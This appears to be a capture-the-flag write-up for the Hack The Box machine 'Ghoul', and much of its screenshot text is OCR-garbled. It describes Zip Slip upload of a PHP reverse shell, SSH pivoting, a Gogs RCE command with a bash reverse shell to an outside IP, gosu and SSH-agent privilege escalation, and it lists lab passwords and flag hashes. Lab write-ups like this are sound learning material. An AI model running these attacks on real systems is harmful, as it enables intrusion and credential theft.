Ghoul – 10.10.10.101

Let’s start off with a basic but efficient nmap scan After we added Ghoul.htb to our hosts file

First let’s sweep all the ports using -Pn -p- tags

nmap -Pn -p- ghoul .htb starting Nmap 7.70 ( https://nmap.org ) at 2019-06-19 08:12 EDT Nrnap Scan report for ghoul .htb (10. 10. 10. 101) Host is up (0.939s latency). Not shown; 65531 closed ports PORT 22,'tcp 80/tcp 2222,'tcp 8080/tcp STATE open open open open SERVICE s sh http EtherNet1P-1 http-proxy

Then let’s do some detections on those ports using -sC -sV -A -Pn -px,x,x…

nmap -sc -sv -A -Pn starting Nmap 7.70 ( https://nmap.org ) at 2019-06-19 08:30 EDT ,Nmap scan report for ghoul .htb 10. Host is up (e.e31s latency). 'poRT STATE SERVICE VERSION open s sh OpenSSH 7.6pI Ubuntu 4ubuntue.I (Ubuntu Linux; 22,'tcp I ssh-hostkey: 2048 f9:bc (RSA) 256 (ECDSA) open http Apache httpd 2.4.29 ((ubuntu)) 80,'tcp I _ ht tp-server-header: Apache/ 2.4.29 (Ubuntu) l_http-title: Aogiri Tree 2222/ t cp open s sh OpenSSH 7.6p1 Ubuntu 4ubuntue.2 (ubuntu Linux; I ssh•hostkey: 2e4B tb:3b (RSA) 256 (ECDSA) 256 (ED25519) 8080/ t cp open http Apache Tomcat/ Coyote JSP engine I. I http•auth: I HTTP/I.1 401 Unauthorized\xeo Basic realm=Aogiri l_http-server-header: Apache -Coyote/ 1.1 l_http-title: Apache Tomcat/ 7.0-88 - Error report Warning: OSScan results may be unreliable because we could not find Aggressive OS guesses: Linux 3.18 (95%), Linux 3.2 • 4.9 (95%), Linux 3.16 (95%), Asus RT.N56u WAP (Li ux 3.4) (95%), Linux 3.1 (93%). Linux 3.2 (93%), Linux 3.10 - 4.11 (93%), Linux 3.13 (93%), DO•wRT v3.• (Linux 4.4.2) (93%), Linux 4.10 (93") NO exact os matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: kernel TRACEROUTE (using port 2222/tcp) ghoul .htb protocol 2.0) protocol 2.0) at least 1 open and 1 closed port HOP RTT ADDRESS 28.26 ms 10.10. 14.1 28.80 ms ghout.htb (10.10. 10.101) os and Service detection performed. Please report any incorrect results at https://nmap.orq/submit/ . dnn

Okay so far we got two ssh ports and 2 websites

Let’s see which one we will put our focus on

Port 80:

Aogiri Tree x Apache Tomcat". 0.88 @ ghoul. htb Home hoi Society ontacts GHOULSOCIETY q@Members

Port 8080:

Aogiri Tree New Tab Q ghoul.htbM'80 Authentication Required http://ghouLhtb:8080is requesting your username and password. The site says: "Aogiri" user Name: Password:

I think it’s obvious we have to start at port 80.

Let’s get dirb running and we can spider around in meantime

We see this at bottom of the site:

Machine generated alternative text: Designed by

Played a bit on the site but nothing has come up yet. Desperate for something we start a brute force attack on the 2 logins.

Using an own made dict from the website -> cewl http://ghoul.htb/  > dict.txt

Now use that dict against ghoul.htb/users/login.php and ghoul.htb:8080

It worked for ghoul.htb:8080

Admin/admin -> LOLOL

Okay we got in

G) ghoul.htb 8080 SIERRA Upload images here! Choose image to Upload to Server Browse— No file selected. Upload
Machine generated alternative text: M\SIERRA HOME ABOUT US SERVICES PORTFOLIO BLOG • CONTACT Upload a zip if you have many images. Choose Zip to Upload in Server evil.zip Browsem Upload

We can upload zip and jpeg files here! Nice.

Let’s do some research on how we can deal with this

By querying “zip upload vulnerability” and “jpeg upload vulnerability” we can get a lot of good information.

First link on zip gives me the zipslip vulnerability so we start digging deeper and see what it does

The Zip Slip vulnerability – what you need to know

In a nutshell, attackers can create Zip archives that use path traversal to overwrite important files on affected systems, either destroying them or replacing them with malicious alternatives.

Could be something, let’s search some exploits for this

https://github.com/ptoomey3/evilarc

By reading it we know what to do. 

We need to have a reverse shell, zip this one using the evilarc.py script and then upload it.

Evilarc script takes following parameters:

• -help Usage: evilarc .:input file* Create archive containing a file python evilarc.py With directory traversal Options; •version - -help show program's version number and exit show this help message and exit -f OUT, - output- fi lezOUT File to Output archive to. Archive type is based Off of file extension. Supported extensions are zip, jar, Defaults to evil-zip. tar, tar.bz2, tar.gz, and tgz. •d DEPTH. - •depth-DEPTH -O PLATFORM, Number directories to traverse. Defaults to 8. -os=PLATFORM OS platform for archive (winlunix). Defaults to win. •p PATH, - -path=PATH Path to include in filename after traversal.

Where <input file> is our reverse shell we got from pentestmonkey

-p will be path where we store the shell -> in html folder -> we can execute it there

–os=unix -> default is windows and that navigating system works different so we need to change it

Default depth on 8 seems enough we will let that as it is

python evilarc.py rival.php -p /var&N/htrnl creatinq evil. zip containing . .1../../../. ./../../..//var/wm/html/rival.php evilarc .py:73: User-warning: Duplicate name: ./var/wvv/html/rival.php• zf.write(fname, zpath) drwxr-xr-x 18:40 drwxr-xr-x 18:09 drwxr-xr•x 18:09 •os=unl total • rwx r -rw-r -rw-r •rw-r 48 -xr•x iual 3 root 3 root 1 root 1 root 8 root 1 root I root root root root root root root root root root 4096 4096 3645 18759 4096 616 3521 3741 Jun Jun Jun Jun Jun Jun Jun Jun 19 19 19 19 19 19 19 19 evitarc . py 18 : 09 evil . zip 19. •09 .git 18. README . md rival . php 18 : 14 rival. zip 18. 30 101/new/eviIarc# gg44

So after we have uploaded the zipfile on the website the malicious zip file will ‘place’ the rival.php script on the website.

*Note this is on port 80 since default directory is /var/www/html

We can trigger the script by just surfing to it

Q ghoul.htb/riva[php

Now we should have shell as www-data

nc -Ivp 8844 listening on [any] 8844 connect to [10.10. 14.161 from ghoul.htb [10. 16.10. 101] 39204 Linux Aogiri 4.15.e•45-generic #48-ubuntu SMP Tue Jan 29 up 25 min, load average: O. 00, 0.01, 2 users, USER kaneki noro pts/ O pts/ 2 FROM 10.10.14.16 14.24 LOGIU@ IDLE JCPU 22:28 17:20 0.045 22:36 1:28 groups —33 data) control turned off UTC 2019 X86 64 X86 64 X86 64 GNU/Linux o. 08 pcpu WHAT 0.045 -bash •bash uid-33(ww.data) /bin/sh: e: can't access tty; job $ whoami wyw- data

First spawn tty shell 

Machine generated alternative text: $ python -c 'import pty;pty.

Now let’s look around

cd cd 'var •data@Aogiri. • /var$ Is backups cache cd backups Is backups cd backups / var docs lib local cd backups lock log mail -la opt run spool t mp cd backups Impo rtant . pdf keys note. txt sales. xtsx cd keys cd keys total 24 root drwxr-xr-x 1 root 1 root I root 1 root root root root root root 4096 4096 1675 1766 1675 Dec Dec Dec Dec Dec 13 13 13 13 13 2018 2018 2018 eto.backup 2018 kaneki.backup 2918 noro_backup dataGAoai ri : / var/backuos/backuos / kevs$

After looking at the 3 files we figure that kaneki is the most important one because that one is encrypted.

After downloading it to our own machine we setup perms right so we can use the file

chmod 400 kan rsa ssh -i kan r sa kanekf@ghoul.htt Enter passphrase for key •kan .

We need a password *because* it is encrypted so let’s continue the search in our www-data shell for password.

Btw you can also copy the rsa file of the other two users to get an ssh shell as them. We decide not to do that and went for the password to get shell as kaneki

So we navigate around and see some juice

archives blog. html contact . html eto. jpg images index. html js Is kaneki-ken. jpg kaneki . html kaneki.jpg ken . jpg less nor O. jpg T,hp rival.php rival . zip secret . php upload! users

Secret.php standing out:

After reading it a few times we understands what’s going on here and see something potentially great

That ILoveTouka ❤ could be password of Aneki,Let’s try that.

ssh Enter passphrase for key 'kan Enter passphrase for key • kan rsa• Last login: wed Jun 19 22:28:35 2019 from 10.10.14.16 kanekieAogiri•- -i kan r sa kanekf@ghoul.htb

Password was ‘ILoveTouka’

Here we got user

Is note txt notes secret. jpg user. txt cat user. txt 7cof11041f21ef4f7d1711d40a1c35c2 kaneki•3Aoqiri

7c0f11041f210f4f7d1711d40a1c35c2

ONTO ROOT

As kaneki connected through ssh, we download a linuxprivchecker.py script from our own webserver and run it

Nothing special here.

If we do ifconfig

Machine generated alternative text: ifconfig ethO: BROADCAST , mtu 1500 inet 172.20.0.10 netmask 255.255.0.0 broadcast 172.20.255.255 ether txqueuelen 0 (Ethernet) RX packets 19392 bytes 9620944 (9.6 MB) RX errors 0 dropped O overruns O frame O TX packets 17680 bytes 10909769 (10.9 MB) TX errors O dropped O overruns O carrier O RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.O.O loop txqueuelen 1000 RX packets 2691 bytes RX errors O dropped O TX packets 2691 bytes TX errors O dropped O (Local Loopback) 7225037 (7.2 MB) overruns O frame O 7225037 (7.2 MB) overruns O carrier O collisions O collisions O

Here we can see there are two interfaces. Which means probably another computer on the other end of connection

We download nmap static binaries and get them on the box using wget from our own  webserver

We see another machine: 

172.20.0.150 -> kaneki-pc

After some more enumeration we get knowledge about the user: kaneki_pub

Let’s try something simple

kaneki-pc: ssh into it 

pass:ILoveTouka

5Sh .20.0. 150 nter passphrase for key • / home/kaneki/ .ssh/id_rsa'• Last loain: Thu 20 10: 19:J9 from

Here we see a to-do note.txt

“Give AogiriTest user access to Eto for git.”

–> that’s a username we could use later maybe

At this pc we see yet another network interface:

etho: ethl: ifconfig BROADCAST , RUNNING.MULTICAST> mtu 1500 inet 172.20.e.150 netmask 255.255.0.0 broadcast 172.20.255.255 ether 02:42: at: 14:00: 96 txqueuelen O (Ethernet) RX packets 15740 bytes 10697359 (10.6 MB) RX errors O dropped O overruns frame O TX packets 12989 bytes 8891668 (8.8 MB) TX errors e dropped e overruns carrier e collisions O mtu 15ee inet 172.18.e. netmask broadcast 172.18.255.255 ether txqueuelen o (Ethernet) RX packets 3573 bytes 7297875 (7.2 Ma) RX errors e dropped o overruns frame o TX packets 4649 bytes 759391 (759.3 KB) TX errors e dropped 9 overruns carrier e collisions O

Let’s see what we can find in that subnet

Machine generated alternative text: . / nmap -sn 172.18.0.0/24 starting Nmap 7.11 ( https://nmap.org ) at 2019-06-20 13:27 UTC Cannot find nmap-payloads. UDP payloads are disabled. Nmap scan report for Aogiri (172.18.0.1) Host is up (0.000635 latency) . Nmap scan report for cuff web 1. cuff default (172.18.0.2) Host is up (0.00046s latency) . Nmap scan report for kaneki-pc (172.18.0.200) Host is up (0.000051s latency). Nmap done: 256 IP addresses (3 hosts up) scanned in 2.61 seconds

Since we are the .200 and the .1 will be routing device or whatever, we have most interest in that .2, let’s check some things

Machine generated alternative text: . /nmap -Pn -pl-5000 172.18.0.2 starting Nmap 7.11 ( https://nmap.org ) at 2019-06-20 13:21 UTC Unable to find nmap-services! Resorting to /etc/services Cannot find nmap-payloads. UDP payloads are disabled. Nmap scan report for cuff web _ 1. cuff default (172.18.0.2) Host is up (0.000205 latency) . Not shown: 4998 closed ports PORT STATE SERVICE open ssh 22/tcp 3000/tcp open unknown

That 3000 port needs some confirmation, even after service scan it didn’t reveal anything

Let’s try making a tunnel from our machine to the 172.18.0.2 so we can output that port 3000 in our browser.

  1. Make tunnel from local machine at port 1234 to port 3000 connected to kaneki using our previously ‘stolen’ id_rsa

Ssh kaneki@ghoul.htb -I kan_rsa -L 1234:127.0.0.1:300

  1. Then in the shell that just popped open we can make the tunnel to where the unknown service is running

Ssh -L 3000:172.18.0.2:3000 kaneki_pub@172.20.0.150

  1. We can now browse in our firefox to localhost:1234
ssh kaneki@ghoul.htb Enter passphrase for key •kan rsa• bind (127.0.0.11 : 1234: Address already in use channel_setup fwd listener_ tcpip: cannot listen to port: 1234 Could not request local foruarding. Last login; Thu Jun 20 2019 from 10. 10.14.16 ssh .L ,Enter passphrase for key ssh/id rsa' : ,Last login: Thu Dun 20 2019 from 172. 20.0. 10 -i kan r sa -L 1234: 127.e.e.1:3ß0€

At webpage we see login

Machine generated alternative text: Home localhost:1234/user/login Explore Help Sign In Username or email • Password • Remember Me Sign In Forgot password? Sign I

Getting the login:

aogiriTest could be username here let’s keep that in mind

That pass is visible here:

kaneki@Aogiri:/usr/share/tomcat7

 grep -r pass -> nice trick to search for passwords in a bunch of files

aogiriTest/test@aogiri123  –> creds to login at localhost:1234

We got in webpage, a clean repo…

Machine generated alternative text: @ localhost:1234 Dashboard AogiriTest • Issues Pull Requests Explore Repository Organization Mirror My Repositories O Collaborative Repositories

What can we do in an empty git? 

Found a script to have rce

https://github.com/TheZ3ro/gogsownz

Options of this script are:

• gogsownz C-h) C-c CREDS] usage. t--repo REPO] [ - -check-tor] [ positional arguments: I-n COOKIENAMEI I-c COOKIE) I-il t--rce RCE] --preauth) 1--windows) 1--cleanup) [--torl --burp] [ -k) [ --verbose] the Gogs server u rl optional arguments: URL for h - -help -C CREDS, show this help message and exit --creds CREDS Credentials for the Gogs server. in the from "username : password" cookie-name COOKIENAME Name of the Gogs-specific session cookie --cookie COOKIE -n COOKIENAME, -c COOKIE, , - -info --rce RCE --repo REPO - -preauth - -windows - -cleanup - -tor - -check-tor - -burp , - -insecure - -verbose, -v Session for the Gogs server, the value in the Cookie Only detect informations about the running Gogs server, then quit Command to execute on the Gogs server use an existing repo for the PrivEsc Try the pre-auth vulnerability Gogs server runs on Windows Remove all created repo after exploit Use tor proxy when performing requests Check that Tor is correctly set up before running use burp proxy when performing requests Allow insecure server connections when using SSL

We did some trial and errors in local machine while listener is running

This did the trick eventually:

python3 gogsownz.py http://127.0.0.1:1234/ –creds AogiriTest:’test@aogiri123′ –rce ‘bash -c “bash -i >& /dev/tcp/10.10.14.16/8845 0>&1″‘ –cleanup -v -n i_like_gogits

We get a connection in our listener

bash-4.4$ whoami hoami

We are now in a shell on 172.18.0.2 box 

bash-4.4$ ifconfig etho if conf Link encap:Ethernet Hwaddr inet addr: 172. 18.0.2 Bcast:172.18.255.255 Mask:255.255.o.e UP BROADCAST RUNNING MULTICAST 1500 Metric: 1 RX packets :3094 errors:G dropped:O overruns:G frame:9 TX packets: 1805 errors:e dropped:e overruns:e carrier:e collisions;e txqueuelen;ø RX bytes :357584 (349.2 KiB) TX bytes :5971384 (5.6 MiB) Link encap:Loca1 Loopback inet addr:127.e.e.1 Mask:2ss.e.e e Metric:l UP LOOP8ACK RUNNING MTU: 65536 RX packets :400 errors:e dropped:O overruns:e frame:O TX packets :400 errors:e dropped:O overruns:e carrier:O collisions:O txqueuelen: RX bytes :46600 (45.5 Kia) TX bytes:466ee (45.5 Kia)

We need some juice on here but not sure where to look, maybe look around for ways to privesc

Found a suid we can exploit here

/usr/sbin/gosu root bash -c ‘su -‘ /bin/sh -i

bash-4.4S /usr/sbin/gosu root bash -c / bin/sh -i/usr/sbin/gosu root bash -c /bin/sh: can't access tty; job control aogiri •app session. sh Su turned oft

Session.sh looks like interesting file, let’s look

Content of session.sh

3713ea5e4353:/root# cat session.sh #!/bin/bash while true do sleep 300 rm -rf /data/gogs/data/sessions sleep 2 curl -d ‘user_name=kaneki&password=12345ILoveTouka!!!’ http://172.18.0.2:3000/user/login done

We also see a 7z file, compressed data.

After downloading it too we opened the zip file using: 7z x aogiri-app.7z

We got some dirs so went looking in them all

Machine generated alternative text: .git# cat ORIG HEAD Od426b533d4f1877f8a114620be8a1294f34ab71

This hash could be used to do a checkout of the git.

Git checkout <hash>

After this the previous wrong password we saw suddenly changed

Cat application.properties

server.port=8080

spring.datasource.url=jdbc:mysql://localhost:3306/db

spring.datasource.username=root

spring.datasource.password=7^Grc%C\7xEQ?tb4

server.address=0.0.0.0

Let’s try that root password on some boxes:

The kaneni-pc seems to do it.

Kaneki_pub$ su- 

Password = 7^Grc%C\7xEQ?tb4

After doing these weare root on the kaneki-pc

Yet have found this in the root.txt

Machine generated alternative text: root@kaneki-pc:—# cat root. txt You've done well to come upto here human. But what you seek doesn't lie here. The journey isn't over yet.

We are not done yet apparently.

Here we can find information about what kind of exploit we will be using

http://blog.7elements.co.uk/2012/04/ssh-agent-abusing-trust-part-1.html?m=1

So basicly whenever someone connects using ssh there will be something saved in tmp folders. The values saved there can be misused by us to get root.

To do this manually it requires a lot of attention so we decided to write a script

./sshup.sh -> wait for some time and we got root

Last login: Thu Jun 20 2019 from 172. 18.0.2€a log. sh root. txt cat root . txt 7cof11e41f21ef4fadff7c077539e72f

7c0f11041f210f4fadff7c077539e72f

Overal SUPER awesome box, learned a lot of new stuff! 

Was worth the time and effort!